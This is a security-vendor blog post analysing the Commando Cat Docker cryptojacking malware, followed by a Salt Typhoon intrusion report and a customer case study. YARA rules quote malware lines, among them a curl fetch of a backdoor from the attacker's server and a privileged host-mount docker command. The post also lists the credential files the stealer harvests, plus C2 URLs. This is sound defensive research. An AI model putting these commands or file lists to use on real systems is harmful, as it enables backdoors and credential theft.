Blog
/
/
January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
02
Jan 2024

Summary

  • Commando Cat is a novel cryptojacking campaign exploiting Docker for Initial Access
  • The campaign deploys a benign container generated using the Commando Project [1]
  • The attacker escapes this container and runs multiple payloads on the Docker host
  • The campaign deploys a credential stealer payload, targeting Cloud Service Provider credentials (AWS, GCP, Azure)
  • The other payloads exhibit a variety of sophisticated techniques, including an interesting process hiding technique (as discussed below) and a Docker Registry blackhole

Introduction: Commando cat

Cado Security labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, a report which was published only a matter of weeks prior. [2]

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet by the IP 45[.]9.148.193 (which is the same as C2). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project “generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command.” 

It is likely used by the attacker to seem like a benign tool and not arouse suspicion.

The attacker then creates the container with a custom command to execute:

Container image with custom command to execute
Figure 1: Container with custom command to execute

It uses the chroot to escape from the container onto the host operating system. This initial command checks if the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • Dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear - this service is not used anywhere in the malware, nor is it part of Linux. It is possible that the service is part of another campaign that the attacker does not want to compete with.

Once these checks pass, it runs the container again with another command, this time to infect it:

Container with infect command
Figure 2: Container with infect command

This script first chroots to the host, and then tries to copy any binaries named wls or cls to wget and curl respectively. A common tactic of cryptojacking campaigns is that they will rename these binaries to evade detection, likely the attacker is anticipating that this box was previously infected by a campaign that renamed the binaries to this, and is undoing that. The attacker then uses either wget or curl to pull down the user.sh payload.

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64 encoded script instead of being pulled down from the C2, this will be discussed in a later section.

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Script
Figure 3

It then calls a function called make_ssh_backdoor, which inserts the following RSA and ED25519 SSH key into the root user’s authorized_keys file:

function make_ssh_backdoor
Figure 4

It then updates a number of SSH config options in order to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile variable to a local variable named “$hidden_authorized_keys”, however this variable is never actually defined in the script, resulting in public key authentication breaking.

Once the SSH backdoor has been installed, the script then calls make_hidden_door. The function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely as an attempt to appear as legitimate. To continue this theme, the attacker also has opted to set the login shell for the “games” user as /usr/bin/nologin. This is not the path for the real nologin binary, and is instead a copy of bash placed here by the malware. This makes the “games” user appear as a regular service account, while actually being a backdoor.

Games user
Figure 5

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

SSH details
Figure 6

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh binary from the C2 server, compiles it, and then executes it.

Script
Figure 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and try authenticating using the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has been commonly used as a payload before, as an example, UNC2891 has made extensive use of TinyShell during their attacks on Oracle Solaris based systems [4].
The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, to then connect to the infected machine.

Script
Figure 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Script
Figure 9

This script works by cloning the Linux mtab file (a list of the active mounts) to another directory. It then creates a new bind mount for the /proc/pid directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to the /proc/pid directory to show an empty directory, causing tools like ps aux to omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount, making it harder to detect.

The script then uses this binary to hide the tshd process.

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. It’s purpose is likely for acting as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way - in order for nodes to find each other, they use their shared secret instead of IP address using the  service. This permits gs-netcat to function in virtually every environment as it circumvents many firewalls on both the client and server end. To calculate a shared secret, the script simply uses the victims IP and hostname:

Script
Figure 10

This is more acceptable than tsh from a security point of view, there are 4 billion possible IP addresses and many more possible hostnames, making a brute force harder, although still possible by using strategies such as lists of common hostnames and trying IPs from blocks known for hosting virtual servers such as AWS.

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, using a specific version based on the architecture of the infected system. Interestingly to note, the attacker will use the cmd.cat containers to untar the downloaded payload, if tar is not available on the system or fails. Instead of using /tmp, it also uses /dev/shm instead, which acts as a temporary file store, but memory backed instead. It is possible that this is an evasion mechanism, as it is much more common for malware to use /tmp. This also results in the artefacts not touching the disk, making forensics somewhat more difficult. This technique has been used before in BPFdoor - a high-profile Linux campaign [6].

Script
Figure 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common method for Linux malware to obtain persistence; however not all systems use systemd, resulting in this payload being rendered entirely ineffective on these systems. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.

Script
Figure 12

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Script
Figure 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Script
Figure 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as IMDS, and environment variables. Interestingly, the script creates a file so that once the script runs the first time, it can never be run again as the file is never removed. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as making the keys harvested by the attacker distinct per infected machine.

The script overall is very similar to scripts that have been previously attributed to TeamTNT and could have been copied from one of their campaigns [7.] However, script-based attribution is difficult, and while the similarities are visible, it is hard to attribute this script to any particular group.

Script
Figure 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber script. Firstly, it makes several requests to IMDS in order to obtain information about the instance’s IAM role and the security credentials for it. The timeout is likely used to stop this part of the script taking a long time to run on systems where IMDS is not available. It would also appear this script only works with IMDSv1, so can be rendered ineffective by enforcing IMDSv2.

Script
Figure 16

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, are then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to store captured information before sending it to the API.

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Script
Figure 17

Finally, it adds the sts caller identity returned from the AWS command line to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are then grabbed by performing a find on the root file system for their name, and the results appended to a temporary file, before the final concatenation of the credentials files is read back into the CSOF variable.

CSOF variable
Figure 18

Next up is get_prov_vars, which simply loops through all processes in /proc and reads out their environment variables into CSOF. This is interesting as the payload already checks the environment variables in a lot of cases, such as in the aws, google, and azure grabbers. So, it is unclear why they grab all data, but then grab specific portions of the data again.

Code
Figure 19

Regardless of what data it has already grabbed, get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber, where it checks for the existence of a variable and then appends its contents (or the file’s contents if the variable is path) to CSOF.

Code
Figure 20

The final thing it grabs is an inspection of all running docker containers via the get_docker function. This can contain useful information about what's running in the container and on the box in general, as well as potentially providing more secrets that are passed to the container.

Code
Figure 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose for which is unclear. It is possible that the attacker is concerned with the endpoint being leaked and consequently being spammed with false data by internet vigilantes, so added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Code
Figure 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.

The base64 payload serves two primary purposes, to deploy an XMRig cryptominer, and to “secure” the docker install on the infected host.

When it is run, the script looks for traces of other malware campaigns. Firstly, it removes all containers that have a command of /bin/bash -c 'apt-get or busybox, and then it removes all containers that do not have a command that contains chroot (which is the initial command used by this payload).

Code
Figure 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner” and stops & disables the services. It then looks for associated binaries such as /root/c3pool/xmrig and /root/moneroocean/xmrig and deletes them from the filesystem. These steps are taken prior to deploying their own miner, so that they aren't competing for CPU time with other threat actors.

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary, should a file with .upd be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name docker cache daemon to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm .

Code
Figure 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy services by creating a bind mount over their /proc entry. The effect of this is that if a system administrator were to use a tool like htop to try and see what process was using up the CPU on the server, they would not be able to see the process.

Finally, the attacker “secures” docker. First, it pulls down alpine and tags it as docker/firstrun (this will become clear as to why later), and then deletes any images in a hardcoded list of images that are commonly used in other campaigns.

Code
Figure 25

Next, it blackholes the docker registry by writing it's hostname to /etc/hosts with an IP of 0.0.0.0

Code
Figure 26

This completely blocks other attackers from pulling their images/tools onto the box, eliminating the risk of competition. Keeping the Alpine image named as docker/firstrun allows the attacker to still use the docker API to spawn an alpine box they can use to break back in, as it is already downloaded so the blackhole has no effect.

Conclusion

This malware sample, despite being primarily scripts, is a sophisticated campaign with a large amount of redundancy and evasion that makes detection challenging. The usage of the hid process hider script is notable as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker Registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

Yara Rule

rule Stealer_Linux_CommandoCat { 
 
meta: 

        description = "Detects CommandoCat aws.sh credential stealer script" 
 
        license = "Apache License 2.0" 
 
        date = "2024-01-25" 
 
        hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 
    strings: 
 
        // Constants 

        $const1 = "CRED_FILE_NAMES" 
 
        $const2 = "MIXED_CREDFILES" 
 
        $const3 = "AWS_CREDS_FILES" 
 
        $const4 = "GCLOUD_CREDS_FILES" 
 
        $const5 = "AZURE_CREDS_FILES" 
 
        $const6 = "VICOIP" 
 
        $const7 = "VICHOST" 

 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

More in this series

No items found.

Blog

/

/

October 20, 2025

Salty Much: Darktrace’s view on a recent Salt Typhoon intrusion

salt typhoonDefault blog imageDefault blog image

What is Salt Typhoon?

Salt Typhoon represents one of the most persistent and sophisticated cyber threats targeting global critical infrastructure today. Believed to be linked to state-sponsored actors from the People’s Republic of China (PRC), this advanced persistent threat (APT) group has executed a series of high-impact campaigns against telecommunications providers, energy networks, and government systems—most notably across the United States.

Active since at least 2019, the group—also tracked as Earth Estries, GhostEmperor, and UNC2286—has demonstrated advanced capabilities in exploiting edge devices, maintaining deep persistence, and exfiltrating sensitive data across more than 80 countries. While much of the public reporting has focused on U.S. targets, Salt Typhoon’s operations have extended into Europe, the Middle East, and Africa (EMEA) where it has targeted telecoms, government entities, and technology firms. Its use of custom malware and exploitation of high-impact vulnerabilities (e.g., Ivanti, Fortinet, Cisco) underscores the strategic nature of its campaigns, which blend intelligence collection with geopolitical influence [1].

Leveraging zero-day exploits, obfuscation techniques, and lateral movement strategies, Salt Typhoon has demonstrated an alarming ability to evade detection and maintain long-term access to sensitive environments. The group’s operations have exposed lawful intercept systems, compromised metadata for millions of users, and disrupted essential services, prompting coordinated responses from intelligence agencies and private-sector partners worldwide. As organizations reassess their threat models, Salt Typhoon serves as a stark reminder of the evolving nature of nation-state cyber operations and the urgent need for proactive defense strategies.

Darktrace’s coverage

In this case, Darktrace observed activity in a European telecommunications organisation consistent with Salt Typhoon’s known tactics, techniques and procedures (TTPs), including dynamic-link library (DLL) sideloading and abuse of legitimate software for stealth and execution.

Initial access

The intrusion likely began with exploitation of a Citrix NetScaler Gateway appliance in the first week of July 2025. From there, the actor pivoted to Citrix Virtual Delivery Agent (VDA) hosts in the client’s Machine Creation Services (MCS) subnet. Initial access activities in the intrusion originated from an endpoint potentially associated with the SoftEther VPN service, suggesting infrastructure obfuscation from the outset.

Tooling

Darktrace subsequently observed the threat actor delivering a backdoor assessed with high confidence to be SNAPPYBEE (also known as Deed RAT) [2][3] to multiple Citrix VDA hosts. The backdoor was delivered to these internal endpoints as a DLL alongside legitimate executable files for antivirus software such as Norton Antivirus, Bkav Antivirus, and IObit Malware Fighter. This pattern of activity indicates that the attacker relied on DLL side-loading via legitimate antivirus software to execute their payloads. Salt Typhoon and similar groups have a history of employing this technique [4][5], enabling them to execute payloads under the guise of trusted software and bypassing traditional security controls.

Command-and-Control (C2)

The backdoor delivered by the threat actor leveraged LightNode VPS endpoints for C2, communicating over both HTTP and an unidentified TCP-based protocol. This dual-channel setup is consistent with Salt Typhoon’s known use of non-standard and layered protocols to evade detection. The HTTP communications displayed by the backdoor included POST requests with an Internet Explorer User-Agent header and Target URI patterns such as “/17ABE7F017ABE7F0”. One of the C2 hosts contacted by compromised endpoints was aar.gandhibludtric[.]com (38.54.63[.]75), a domain recently linked to Salt Typhoon [6].

Detection timeline

Darktrace produced high confidence detections in response to the early stages of the intrusion, with both the initial tooling and C2 activities being strongly covered by both investigations by Darktrace Cyber AI AnalystTM investigations and Darktrace models. Despite the sophistication of the threat actor, the intrusion activity identified and remediated before escalating beyond these early stages of the attack, with Darktrace’s timely high-confidence detections likely playing a key role in neutralizing the threat.

Cyber AI Analyst observations

Darktrace’s Cyber AI Analyst autonomously investigated the model alerts generated by Darktrace during the early stages of the intrusion. Through its investigations, Cyber AI Analyst discovered the initial tooling and C2 events and pieced them together into unified incidents representing the attacker’s progression.

Cyber AI Analyst weaved together separate events from the intrusion into broader incidents summarizing the attacker’s progression.
Figure 1: Cyber AI Analyst weaved together separate events from the intrusion into broader incidents summarizing the attacker’s progression.

Conclusion

Based on overlaps in TTPs, staging patterns, infrastructure, and malware, Darktrace assesses with moderate confidence that the observed activity was consistent with Salt Typhoon/Earth Estries (ALA GhostEmperor/UNC2286). Salt Typhoon continues to challenge defenders with its stealth, persistence, and abuse of legitimate tools. As attackers increasingly blend into normal operations, detecting behavioral anomalies becomes essential for identifying subtle deviations and correlating disparate signals. The evolving nature of Salt Typhoon’s tradecraft, and its ability to repurpose trusted software and infrastructure, ensures it will remain difficult to detect using conventional methods alone. This intrusion highlights the importance of proactive defense, where anomaly-based detections, not just signature matching, play a critical role in surfacing early-stage activity.

Credit to Nathaniel Jones (VP, Security & AI Strategy, FCISO), Sam Lister (Specialist Security Researcher), Emma Foulger (Global Threat Research Operations Lead), Adam Potter (Senior Cyber Analyst)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

IoC-Type-Description + Confidence

89.31.121[.]101 – IP Address – Possible C2 server

hxxp://89.31.121[.]101:443/WINMM.dll - URI – Likely SNAPPYBEE download

b5367820cd32640a2d5e4c3a3c1ceedbbb715be2 - SHA1 – Likely SNAPPYBEE download

hxxp://89.31.121[.]101:443/NortonLog.txt - URI - Likely DLL side-loading activity

hxxp://89.31.121[.]101:443/123.txt - URI - Possible DLL side-loading activity

hxxp://89.31.121[.]101:443/123.tar - URI - Possible DLL side-loading activity

hxxp://89.31.121[.]101:443/pdc.exe - URI - Possible DLL side-loading activity

hxxp://89.31.121[.]101:443//Dialog.dat - URI - Possible DLL side-loading activity

hxxp://89.31.121[.]101:443/fltLib.dll - URI - Possible DLL side-loading activity

hxxp://89.31.121[.]101:443/DisplayDialog.exe - URI - Possible DLL side-loading activity

hxxp://89.31.121[.]101:443/DgApi.dll - URI - Likely DLL side-loading activity

hxxp://89.31.121[.]101:443/dbindex.dat - URI - Likely DLL side-loading activity

hxxp://89.31.121[.]101:443/1.txt - URI - Possible DLL side-loading activity

hxxp://89.31.121[.]101:443/imfsbDll.dll – Likely DLL side-loading activity

hxxp://89.31.121[.]101:443/imfsbSvc.exe - URI – Likely DLL side-loading activity

aar.gandhibludtric[.]com – Hostname – Likely C2 server

38.54.63[.]75 – IP – Likely C2 server

156.244.28[.]153 – IP – Possible C2 server

hxxp://156.244.28[.]153/17ABE7F017ABE7F0 - URI – Possible C2 activity

MITRE TTPs

Technique | Description

T1190 | Exploit Public-Facing Application - Citrix NetScaler Gateway compromise

T1105 | Ingress Tool Transfer – Delivery of backdoor to internal hosts

T1665 | Hide Infrastructure – Use of SoftEther VPN for C2

T1574.001 | Hijack Execution Flow: DLL – Execution of backdoor through DLL side-loading

T1095 | Non-Application Layer Protocol – Unidentified application-layer protocol for C2 traffic

T1071.001| Web Protocols – HTTP-based C2 traffic

T1571| Non-Standard Port – Port 443 for unencrypted HTTP traffic

Darktrace Model Alerts during intrusion

Anomalous File::Internal::Script from Rare Internal Location

Anomalous File::EXE from Rare External Location

Anomalous File::Multiple EXE from Rare External Locations

Anomalous Connection::Possible Callback URL

Antigena::Network::External Threat::Antigena Suspicious File Block

Antigena::Network::Significant Anomaly::Antigena Significant Server Anomaly Block

Antigena::Network::Significant Anomaly::Antigena Controlled and Model Alert

Antigena::Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena::Network::External Threat::Antigena File then New Outbound Block  

References

[1] https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a

[2] https://www.trendmicro.com/en_gb/research/24/k/earth-estries.html

[3] https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/k/earth-estries/IOC_list-EarthEstries.txt

[4] https://www.trendmicro.com/en_gb/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html

[5] https://lab52.io/blog/deedrat-backdoor-enhanced-by-chinese-apts-with-advanced-capabilities/

[6] https://www.silentpush.com/blog/salt-typhoon-2025/

The content provided in this blog is published by Darktrace for general informational purposes only and reflects our understanding of cybersecurity topics, trends, incidents, and developments at the time of publication. While we strive to ensure accuracy and relevance, the information is provided “as is” without any representations or warranties, express or implied. Darktrace makes no guarantees regarding the completeness, accuracy, reliability, or timeliness of any information presented and expressly disclaims all warranties.

Nothing in this blog constitutes legal, technical, or professional advice, and readers should consult qualified professionals before acting on any information contained herein. Any references to third-party organizations, technologies, threat actors, or incidents are for informational purposes only and do not imply affiliation, endorsement, or recommendation.

Darktrace, its affiliates, employees, or agents shall not be held liable for any loss, damage, or harm arising from the use of or reliance on the information in this blog.

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content.

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO

Blog

/

/

October 15, 2025

How a Major Civil Engineering Company Reduced MTTR across Network, Email and the Cloud with Darktrace

Default blog imageDefault blog image

Asking more of the information security team

“What more can we be doing to secure the company?” is a great question for any cyber professional to hear from their Board of Directors. After successfully defeating a series of attacks and seeing the potential for AI tools to supercharge incoming threats, a UK-based civil engineering company’s security team had the answer: Darktrace.

“When things are coming at you at machine speed, you need machine speed to fight it off – it’s as simple as that,” said their Information Security Manager. “There were incidents where it took us a few hours to get to the bottom of what was going on. Darktrace changed that.”

Prevention was also the best cure. A peer organization in the same sector was still in business continuity measures 18 months after an attack, and the security team did not want to risk that level of business disruption.

Legacy tools were not meeting the team’s desired speed or accuracy

The company’s native SaaS email platform took between two and 14 days to alert on suspicious emails, with another email security tool flagging malicious emails after up to 24 days. After receiving an alert, responses often took a couple of days to coordinate. The team was losing precious time.

Beyond long detection and response times, the old email security platform was no longer performing: 19% of incoming spam was missed. Of even more concern: 6% of phishing emails reached users’ inboxes, and malware and ransomware email was also still getting through, with 0.3% of such email-borne payloads reaching user inboxes.

Choosing Darktrace

“When evaluating tools in 2023, only Darktrace had what I was looking for: an existing, mature, AI-based cybersecurity solution. ChatGPT had just come out and a lot of companies were saying ‘AI this’ and ‘AI that’. Then you’d take a look, and it was all rules- and cases-based, not AI at all,” their Information Security Manager.

The team knew that, with AI-enabled attacks on the horizon, a cybersecurity company that had already built, fielded, and matured an AI-powered cyber defense would give the security team the ability to fend off machine-speed attacks at the same pace as the attackers.

Darktrace accomplishes this with multi-layered AI that learns each organization’s normal business operations. With this detailed level of understanding, Darktrace’s Self-Learning AI can recognize unusual activity that may indicate a cyber-attack, and works to neutralize the threat with precise response actions. And it does this all at machine speed and with minimal disruption.

On the morning the team was due to present its findings, the session was cancelled – for a good reason. The Board didn’t feel further discussion was necessary because the case for Darktrace was so conclusive. The CEO described the Darktrace option as ‘an insurance policy we can’t do without’.

Saving time with Darktrace / EMAIL

Darktrace / EMAIL reduced the discovery, alert, and response process from days or weeks to seconds .

Darktrace / EMAIL automates what was originally a time-consuming and repetitive process. The team has recovered between eight and 10 working hours a week by automating much of this process using / EMAIL.

Today, Darktrace / EMAIL prevents phishing emails from reaching employees’ inboxes. The volume of hostile and unsolicited email fell to a third of its original level after Darktrace / EMAIL was set up.

Further savings with Darktrace / NETWORK and Darktrace / IDENTITY

Since its success with Darktrace / EMAIL, the company adopted two more products from the Darktrace ActiveAI Security Platform – Darktrace / NETWORK and Darktrace / IDENTITY.

These have further contributed to cost savings. An initial plan to build a 24/7 SOC would have required hiring and retaining six additional analysts, rather than the two that currently use Darktrace, costing an additional £220,000 per year in salary. With Darktrace, the existing analysts have the tools needed to become more effective and impactful.

An additional benefit: Darktrace adoption has lowered the company’s cyber insurance premiums. The security team can reallocate this budget to proactive projects.

